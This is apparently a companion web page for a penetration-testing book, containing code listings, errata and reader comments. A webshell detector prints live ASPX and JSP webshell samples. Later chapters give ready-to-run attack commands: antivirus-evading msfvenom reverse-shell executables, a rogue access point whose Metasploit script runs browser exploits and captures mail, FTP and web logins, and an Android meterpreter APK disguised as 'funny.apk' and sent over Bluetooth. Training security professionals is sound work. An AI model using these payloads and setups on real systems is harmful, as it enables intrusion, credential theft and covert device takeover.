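    "aspx2.aspx": r'''<%@ Page Language = Jscript %><%var/*-*-*/P/*-*-*/=/*-*-*/"e"+"v"+/*-*-*/"a"+"l"/*-*-*/+"("+"R"+"e"+/*-*-*/"q"+/*-*-*/"u"+/*-*-*/"e"/*-*-*/+"s"+/*-*-*/"t"+"[/*--*/"L"/*-*-*/]"+ ","+"\""+"u"+"n"+"s"/*-*-*/+"a"+"f"+"e"+"\""+")";eval (/*--*/P/*-*-*/,/*--*/"u"+"n"+"s"/*-*-*/+"a"+"f"+"e"/*--*/);%>''',
    "jsp1.jsp": r'''<% if(request.getParameter("l")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("l"))).write(request.getParameter("m").getBytes()); %>''',
    # constructed benign page: reads a parameter but never executes it
    "hello.asp": r'''<% Dim name: name = Request("name"): Response.Write("Hello, " & Server.HTMLEncode(name)) %>''',
}


def normalize(src: str) -> str:
    """Undo the cheap obfuscations one-line shells use; return lower-cased text."""
    s = re.sub(r"/\*.*?\*/", "", src, flags=re.DOTALL)              # drop /* ... */

    def chr_to_literal(m):                                          # chr(114) -> "r"
        c = chr(int(m.group(1)))
        return '"' + ('""' if c == '"' else c) + '"'
    s = re.sub(r"\bchr\s*\(\s*(\d+)\s*\)", chr_to_literal, s, flags=re.IGNORECASE)

    prev = None                                                      # "ev"+"al" -> "eval"
    while prev != s:
        prev, s = s, re.sub(r'"\s*[+&]\s*"', "", s)
    return re.sub(r"\s+", " ", s).lower()


# (rule name, pattern applied to the normalised text, score)
RULES = [
    ("asp_executeglobal_request", r'executeglobal\s*\(\s*request\s*\(', 10),
    ("asp_execute_eval_request",  r'execute\s*\(\s*eval\s*\(\s*"request"', 10),
    ("aspx_eval_request",         r'eval\s*\(\s*request(\.item)?\s*[\[(]', 10),
    ("aspx_eval_var_unsafe",      r'eval\s*\(\s*[a-z_]\w*\s*,\s*"unsafe"\s*\)', 8),
    ("jsp_request_to_file",       r'fileoutputstream\s*\(.*request\.getparameter\s*\(', 10),
    ("execute_plus_request",      r'\bexecute\s*\(', 5),   # weak: only counts with request( present
]


def scan(src: str):
    """Return [(rule_name, score)] for one file; an empty list means nothing matched."""
    text = normalize(src)
    hits = []
    for name, pattern, score in RULES:
        if not re.search(pattern, text):
            continue
        if name == "execute_plus_request" and not re.search(r'\brequest\s*\(', text):
            continue
        hits.append((name, score))
    return hits


def scan_all(samples=SAMPLES):
    """{filename: [(rule, score), ...]} for every sample."""
    return {name: scan(src) for name, src in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(f"{name:12} {'CLEAN' if not hits else hits}")
```

The second ASP sample (Execute(X) with X filled from Request) is only caught by the weak rule, because the dangerous call and the tainted input are in different statements; that is the general limit of pattern matching without data-flow tracking, and why such hits are worth a manual look rather than an automatic verdict.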

Chapter 15

Generating an encoded (AV-evading) payload with msfvenom

Examples:
msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe --platform Windows -a x86 -n 30 LHOST=192.168.158.134 LPORT=4444 > /tmp/game1.exe

msfvenom -p windows/shell_reverse_tcp -f raw -n 30 LHOST=192.168.158.134 LPORT=4444 | msfvenom --platform Windows -a x86 -e x86/unicode_mixed -i 3 -b '\x00' -f raw -n 10 | msfvenom --platform Windows -a x86 -e x86/call4_dword_xor -i 2 -b '\x00' -f exe -n 30 > /tmp/game2.exe

Chapter 16

aircrack-ng suite

Choosing a wireless adapter for aircrack 1
Choosing a wireless adapter for aircrack 2
Choosing a wireless adapter for aircrack 3

airolib-ng
 Examples:
airolib-ng LiteDb --stats           show database statistics

airolib-ng LiteDb --clean all           remove stale data and compact the database

airolib-ng LiteDb --import essid ssidlist.txt   import AP names (ESSIDs) from a text file

airolib-ng LiteDb --import passwd password.lst   import a password dictionary from a text file

airolib-ng LiteDb --batch           compute and store the PMKs

airolib-ng LiteDb --verify all           verify every PMK in the database

airolib-ng LiteDb --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="Belle";'   give the ESSID "Belle" the highest priority so it is processed first

airolib-ng LiteDb --sql 'select hex(pmk) from pmk where hex(pmk) like "%03AE9EF%"'   look up stored PMKs by a hex fragment

airolib-ng LiteDb --export cowpatty Belle cowexportofBelle.cow   export the data for Belle in cowpatty format, for use with cowpatty

airolib-ng LiteDb --import cowpatty cowexportoftest      import AP data and PMKs from a cowpatty-format file (cowexportoftest)
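What airolib-ng --batch actually precomputes, as an added example that is not code from the book or the aircrack-ng project. The WPA/WPA2-PSK Pairwise Master Key is PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes): it depends only on the (ESSID, passphrase) pair and never on the captured handshake, so it can be computed once per pair and stored, which is what the airolib-ng database holds and why the ESSID list has to be imported before --batch. ESSIDS and WORDLIST are constructed; the ("IEEE", "password") value is the test vector from the IEEE 802.11 standard.

```python
"""PMK precomputation, verification and lookup, mirroring airolib-ng's database."""
import hashlib
import time

ESSIDS = ["Belle", "linksys"]                         # constructed
WORDLIST = ["password", "12345678", "qwertyuiop"]     # constructed


def compute_pmk(essid: str, passphrase: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, dklen=32)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA passphrase is 8..63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def batch(essids, wordlist):
    """Like `airolib-ng --batch`: {(essid, passphrase): pmk} for every pair."""
    return {(e, p): compute_pmk(e, p) for e in essids for p in wordlist}


def verify(table):
    """Like `--verify all`: recompute every stored PMK; return the keys that differ."""
    return [k for k, pmk in table.items() if compute_pmk(*k) != pmk]


def lookup(table, essid, hex_fragment):
    """Like `--sql 'select hex(pmk) ... like "%frag%"'`, restricted to one ESSID."""
    frag = hex_fragment.lower()
    return [(k, pmk.hex()) for k, pmk in table.items()
            if k[0] == essid and frag in pmk.hex()]


def ieee_vector_ok() -> bool:
    """Self-check against the standard's ("IEEE", "password") test vector."""
    want = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return compute_pmk("IEEE", "password").hex() == want


if __name__ == "__main__":
    t0 = time.perf_counter()
    table = batch(ESSIDS, WORDLIST)
    dt = time.perf_counter() - t0
    print(f"{len(table)} PMKs in {dt:.3f}s ({len(table) / dt:.0f} PMK/s); "
          f"bad={verify(table)}; vector ok={ieee_vector_ok()}")
```

The same passphrase gives a different PMK for every ESSID, so a table built for "Belle" says nothing about "linksys"; that is the whole reason the prio trick above exists, and why a mistyped ESSID in ssidlist.txt quietly produces a table with no useful rows.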

Deploying a rogue AP with airbase-ng and sslstrip

Edit /etc/dhcp/dhcpd.conf
# Sample configuration file for ISC dhcpd for Debian
#
ddns-update-style none;
log-facility local7;
default-lease-time 60;
max-lease-time 7200;

option subnet-mask 255.255.255.0;
option broadcast-address 192.168.99.255;
option routers 192.168.99.254;
option netbios-name-servers 192.168.99.254;
option domain-name-servers 8.8.8.8;


subnet 192.168.99.0 netmask 255.255.255.0 {
      range 192.168.99.100 192.168.99.200;
}

Deploying a rogue AP with airbase-ng and Metasploit

 Edit /etc/karma.rc
# browser_autopwn: serve a fake web site
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 192.168.99.254
setg AUTOPWN_PORT 55555
setg AUTOPWN_URI /
set LHOST 192.168.99.254
# listener for sessions from successful exploits
set LPORT 4444
set SRVPORT 55555
set URIPATH /
run

# pop3: capture all mail client logins
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run -j

use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run -j

# ftp: capture all ftp logins
use auxiliary/server/capture/ftp
run -j

# smtp: capture all smtp logins
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run -j

use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run -j

# http: capture all http/https requests
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run -j

use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run -j


Run in terminal A
airmon-ng check kill
airmon-ng start wlan0
airbase-ng -C 30 -e linksys -c 9 -v wlan0mon

Run in terminal B
ifconfig at0 up 192.168.99.254 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0

Run in terminal C
iptables -t nat -F
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -s 192.168.99.0/24 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 80 -j REDIRECT --to 80
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 443 -j REDIRECT --to 443
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 110 -j REDIRECT --to 110
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 25 -j REDIRECT --to 25
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 21 -j REDIRECT --to 21
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 465 -j REDIRECT --to 465
iptables -t nat -A PREROUTING -p tcp -i at0 --dport 995 -j REDIRECT --to 995
msfconsole -q -r /etc/karma.rc

Chapter 17

Bluetooth basics

Bluesnarfer

AT command reference

Building funny.apk

msfvenom -p android/meterpreter/reverse_tcp -f raw -o ~/funny.apk LHOST=192.168.18.131 LPORT=4444

Set up the reverse-connection listener

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.18.131
set LPORT 4444
run


Send funny.apk to the target device

bluetooth-sendto --device=40:b8:37:96:d1:b5 ~/funny.apk

Chapter 18

(no entries)

Chapter 19

(no entries)

Appendix

(no entries)

Errata  (back to top)

Page 4-2, line 2
  Corrected: apt install locate
  Original:  apt locate
  Note: "install" was missing from the command. Thanks to the reader who pointed it out.

Page 4-11, line 11
  Corrected: Change it to the following (the main change is the --allow-header-host option):
             ExecStart=/usr/sbin/gsad --foreground --listen=0.0.0.0 --port=9392 --mlisten=127.0.0.1 --mport=9390 --allow-header-host=192.168.18.143
             After editing, run these two commands:
             systemctl daemon-reload
             systemctl restart greenbone-security-assistant.service
  Original:  Change it to the following (the main change is the --allow-header-host option):
             ExecStart=/usr/sbin/gsad --foreground --listen=0.0.0.0 --port=9392 --mlisten=127.0.0.1 --mport=9390 --allow-header-host=192.168.18.143
  Note: A reader suggested reloading the service with systemctl after changing ExecStart. When the author originally tested this, the machine was shut down and restarted after the edit, and reloading the service did not come to mind.

Page 9-55, line 1
  Corrected: Menu path: 03 - Web Application Analysis\wpscan
                        03 - Web Application Analysis\CMS Identification\wpscan
                        03 - Web Application Analysis\Web Vulnerability Scanners\wpscan
                        or run wpscan from a terminal
             Syntax: wpscan [OPTIONs] -u URL
  Original:  Menu path: 03 - Web Application Analysis\webscan
                        03 - Web Application Analysis\CMS Identification\webscan
                        03 - Web Application Analysis\Web Vulnerability Scanners\webscan
                        or run webscan from a terminal
             Syntax: webscan [OPTIONs] -u URL
  Note: The command name was misprinted as webscan.

Page 9-65, line 15
  Corrected: Syntax: clusterd [OPTIONs] -i URL
  Original:  Syntax: clusterd [OPTIONs] -u URL
  Note: The option -i was mistyped as -u.










4 comments:

  1. page 4-2
    chapter 4 apt locate --> apt install locate

    page 4-11

    4.2.4 After adding --allow-header-host=IP to /lib/systemd/system/greenbone-security-assistant.service, run
    # systemctl daemon-reload
    # systemctl restart greenbone-security-assistant.service

    Reply
    1. Thank you for the careful corrections; please keep the feedback coming!
      Thank you!

  2. Hello, my environment is Windows 11 with VMware Workstation 16. Following the book's steps up to Figure 2-28 (installing GRUB to the MBR), an error appears saying the MBR cannot be created.... How should I solve this? Thank you!

    Reply
    1. Hello, I have not encountered this problem. You could try searching Google for the error message; others may have run into the same situation, possibly along with a fix.